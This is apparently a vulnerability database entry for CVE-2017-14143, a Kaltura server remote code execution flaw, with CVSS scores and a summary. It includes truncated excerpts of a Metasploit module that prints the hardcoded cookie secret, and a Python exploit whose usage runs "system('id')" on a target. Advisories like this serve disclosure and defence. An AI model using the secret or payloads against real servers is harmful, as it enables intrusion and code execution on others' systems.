CVE-2017-14143

Published: 19/09/2017 Updated: 27/01/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 760
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

The getUserzoneCookie function in Kaltura prior to 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote malicious users to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.

Vulnerable Product

kaltura kaltura server

Exploits

    ##
    # This module requires Metasploit: metasploit.com/download
    # Current source: github.com/rapid7/metasploit-framework
    ##
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
      CookieSecret = 'y3tAno3therS$cr3T'
      include Msf::Exploit::Remote::HttpClient
      def initialize(info = {})
        super(update_info(info ...

    #!/usr/bin/env python
    # Kaltura <= 13.1.0 RCE (CVE-2017-14143)
    # telekomsecurity.github.io/2017/09/kaltura-rce.html
    #
    # $ python kaltura_rce.py "example.com" 0_xxxxxxxx "system('id')"
    # [~] host: example.com
    # [~] entry_id: 0_xxxxxxxx
    # [~] code: system('id')
    # [+] sending request
    # uid=1003(wwwrun) gid=50004(www) gro ...

Kaltura versions 13.1.0 and below suffer from a remote code execution vulnerability ...
Kaltura versions 13.1.0 and below suffer from code execution and cross site scripting vulnerabilities ...